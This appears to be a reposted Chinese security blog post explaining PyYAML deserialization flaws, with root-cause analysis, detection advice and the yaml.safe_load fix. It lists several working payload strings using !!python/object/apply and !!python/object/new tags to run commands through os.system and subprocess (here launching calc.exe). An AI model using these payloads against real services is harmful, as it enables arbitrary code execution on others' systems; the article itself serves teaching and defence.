2. 程式人生 > >Python PyYAML反序列化漏洞

Python PyYAML反序列化漏洞

阿新 發佈:2018-12-15

基本概念

(引用百度)YAML是“YAML不是一種標記語言”的外語縮寫;但為了強調這種語言以資料做為中心,而不是以置標語言為重點,而用返璞詞重新命名。它是一種直觀的能夠被電腦識別的資料序列化格式,是一個可讀性高並且容易被人類閱讀,容易和指令碼語言互動,用來表達資料序列的程式語言。

PyYAML是Python中YAML語言的編輯器和直譯器。

安裝:pip install PyYAML

兩個函式:

yaml.dump():將一個Python物件序列化生成為yaml文件。

yaml.load():將一個yaml文件反序列化為一個Python物件。

簡單的用例:

可以看到,User物件經過yaml序列化之後內容為一行字串,簡單解釋一下:“!!pythonobject”為yaml標籤,yaml.load()會識別該標籤並呼叫相應的方法執行反序列化操作;冒號後面的“__main__”為py檔名,這裡為本檔案的意思;“User”為序列化的物件型別,後面緊跟的大括號即為該物件的屬性及其屬性值。

更詳細的說明可參考官方文件:https://pyyaml.org/wiki/PyYAMLDocumentation

 

Demo

這裡編寫簡單的Demo,一個py檔案用於將惡意類序列化為字串儲存到yaml檔案中,另一個py檔案用於反序列化yaml檔案內容為惡意類物件從而達到利用反序列化漏洞的目的。

yaml_test.py

先建立一個poc物件再呼叫yaml.dump()將其序列化為一個字串,其中第10行程式碼為將預設的“__main__”替換為該檔名“yaml_test”,目的是為了後面yaml.load()反序列化該字串的時候會根據yaml檔案中的指引去讀取yaml_ test.py中的poc這個類,否則無法正確執行:

 

yaml_test2.py

直接yaml.load()讀取目標yaml檔案,由!!python/object標籤解析其中的名為yaml_test的module中的poc類,最後執行了該類物件的__init__()方法從而執行了命令:

 

漏洞根源分析

到$PYTHON_HOME/lib/site-packages/yaml/constructor.py中檢視3個特殊Python標籤的原始碼。

!!python/object標籤:

!!python/object/new標籤:

!!python/object/apply標籤:

可以看到,!!python/object/new標籤的程式碼實現其實就是!!python/object/apply標籤的程式碼實現,只是最後newobj引數值不同而已。這3個Python標籤中都是呼叫了make_python_instance()函式,檢視該函式:

可以看到,在該函式是會根據引數來動態建立新的Python類物件或通過引用module的類建立物件,從而可以執行任意命令。

 

通用payload

只要存在yaml.load()且引數可控,則可以利用yaml反序列化漏洞,payload列舉如下,當然不止如下:

附上測試程式碼:

import yaml

payload = '!!python/object/apply:subprocess.check_output [[calc.exe]]'
#payload = '!!python/object/apply:subprocess.check_output ["calc.exe"]'
#payload = '!!python/object/apply:subprocess.check_output [["calc.exe"]]'
#payload = '!!python/object/apply:os.system ["calc.exe"]'
#payload = '!!python/object/new:subprocess.check_output [["calc.exe"]]'
#payload = '!!python/object/new:os.system ["calc.exe"]'


yaml.load(payload)

 

一個疑問點?

為什麼“!!python/object”標籤不好使,明明Demo用的是這個標籤,但通用payload中無法執行該payload?看了一些網上的文章也沒有分析原因,其實檢視官方文件就知道怎麼回事了:

可以看到,!!python/object標籤的使用格式和另外兩個根本就是兩碼事,其接收引數是使用大括號{}而非中括號[],且並沒有對引數args進行接收。也就是說,!!python/object標籤只針對於物件類進行使用。

 

檢測方法

全域性搜尋Python程式碼中是否包含“import yaml”,若包含則進一步排查是否呼叫yaml.load()且引數是可控的。

 

防禦方法

使用安全函式yaml.safe_load()替代yaml.load()即可。

相關推薦

Python PyYAML序列漏洞

基本概念 (引用百度)YAML是“YAML不是一種標記語言”的外語縮寫;但為了強調這種語言以資料做為中心,而不是以置標語言為重點,而用返璞詞重新命名。它是一種直觀的能夠被電腦識別的資料序列化格式,是一個可讀性高並且容易被人類閱讀,容易和指令碼語言互動,用來表達資料序列的程式語言。 PyY

Python 序列漏洞學習筆記

## 參考文章 [一篇文章帶你理解漏洞之 Python 反序列化漏洞](https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%

php序列漏洞繞過魔術方法 __wakeup

prot poc cte enc repo private 成員 .html blank 0x01 前言 前天學校的ctf比賽,有一道題是關於php反序列化漏洞繞過wakeup,最後跟著大佬們學到了一波姿勢。。 0x02 原理 序列化與反序列化簡單介紹 序列化:把復雜的數據

小白審計JACKSON序列漏洞

ces serialize 簡單 mage 簡單介紹 rac led 代碼審計 ble 1. JACKSON漏洞解析 poc代碼:main.java import com.fasterxml.jackson.databind.ObjectMapper; import co

PHP序列漏洞學習

exc tof target fun 反序 ring 內容 style 字符串 serialize:序列化 unserialize: 反序列化 簡單解釋: serialize 把一個對象轉成字符串形式, 可以用於保存 unserialize 把serialize序列化後的字

XMLDecoder序列漏洞

xmldecoder java 反序列化 Java 調用XMLDecoder解析XML文件的時候,存在命令執行漏洞。樣例XML文件如下所示:<?xml version="1.0" encoding="UTF-8"?> <java version="1.8.0_131" class

PHP序列漏洞

發生 arc arr 再看 記錄 php7 數據化 tostring 又能 聊一聊PHP反序列化漏洞 2016年11月4日 反序列化漏洞在各種語言中都較為常見,下面就簡單聊一聊PHP的反序列化漏洞(PHP對象註入)。第一次了解這個洞還是在某次ctf上,就簡單記錄下個人理解

Typecho 序列漏洞導致前臺 getshell

typecho 反序列化漏洞導致前臺 getshell前言最早知道這個漏洞是在一個微信群裏,說是install.php文件裏面有個後門,看到別人給的截圖一看就知道是個PHP反序列化漏洞,趕緊上服務器看了看自己的博客,發現自己也中招了,相關代碼如下:然後果斷在文件第一行加上了die:<?php die(‘

java序列漏洞的檢測

spa div ria comm span Coding python odin ima 1、首先下載常用的工具ysoserial 這邊提供下載地址:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-

WebLogic 10.3.6.0 升級序列漏洞補丁

成功 wget命令 下載 攻擊 generic 價格 server move 被黑 由於最近比特幣被炒到近乎不可思議的價格,所以網絡上的肉雞都被黑產們一個個培養成了挖礦雞。今兒就聊聊如何進行WebLogic10的反序列化漏洞的升級方法。 1、修改bsu.sh 把內存

java序列漏洞原理研習

java程序 out import 修改 sed 判斷 pub 發現 commons 零、Java反序列化漏洞   java的安全問題首屈一指的就是反序列化漏洞,可以執行命令啊,甚至直接getshell,所以趁著這個假期好好研究一下java的反序列化漏洞。另外呢,組裏多位大

Java序列漏洞的挖掘、攻擊與防禦

body per 所有 http 操作 www except ride 方法 一、Java反序列化漏洞的挖掘 1、黑盒流量分析: 在Java反序列化傳送的包中,一般有兩種傳送方式,在TCP報文中,一般二進制流方式傳輸,在HTTP報文中,則大多以base64傳輸。因而在流量中

weblogic AND jboss 序列漏洞

我們 cat logic -- ram icc 訪問 web訪問 驗證 C:\Program Files\Java\jboss-4.2.3.GA\server\default\deploy\http-invoker.sar\invoker.war\WEB-INF serve

CVE-2017-12149JBoss 序列漏洞利用

命令行 edi AC 頁面 server cto dex form 文件頭 CVE-2017-12149 漏洞描述 互聯網爆出JBOSSApplication Server反序列化命令執行漏洞(CVE-2017-12149),遠程攻擊者利用漏洞可在未經任何身份驗證的服務器

ref:PHP序列漏洞成因及漏洞挖掘技巧與案例

tmp 問題 文章 extend === 代碼 簡單的 ted IE ref:https://www.anquanke.com/post/id/84922 PHP反序列化漏洞成因及漏洞挖掘技巧與案例 一、序列化和反序列化 序列化和反序列化的目的是使得程序間傳輸對象會更加方

應急響應--記錄一次漏洞緊急處理中意外發現的挖礦木馬(Shiro序列漏洞和ddg挖礦木馬)

var vpc hist crontab 使用 8.4 wget 序列化 coo 背景 某公司線上服務器意外發現一個Apache Shiro 反序列化漏洞,可以直接GetShell。出於做安全的謹慎,馬上出現場應急,確認漏洞。該漏洞存在在cookie字段中的remembe

【原創】Spring Data Redis <=2.0.3序列漏洞

反序列化 默認 用戶 字節碼 href http strong comm ons Spring Data Redis隸屬於Spring Data家族, 提供簡單易用的方式來訪問Redis緩存。 Spring Data Redis在往Redis裏面寫數據的時候,默認會先對數據

weblogic序列漏洞 cve-2018-3245

type 技術 序列化 int live 查看 efs intent loader weblogic反序列化漏洞 CVE-2018-3245 0x00 針對cve-2018-2893的修復 針對JRMP反序列化修復的方式依舊是增加黑名單:黑名單package:java.rm

記錄WebLogic(CVE-2017-10271)序列漏洞找WEBSHELL地址

記錄WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址 首先,郭姓某牛丟來了一個有weblogic漏洞的地址http://x.x.x.x:7001 說用k8的weblogic2628去getshell不能連結shell,我也試了下,好像確實不能連

Java序列漏洞:在受限環境中從漏洞發現到獲取反向Shell

前言 Java反序列化漏洞可以說是Java安全的一塊心病,近年來更是在安全界“出盡風頭”。其實說到Java反序列化的問題,早在2015年年初的在AppSecCali大會上,兩名安全研究人員Chris Frohoff 和 Gabriel Lawrence發表了一篇題為《Marshallin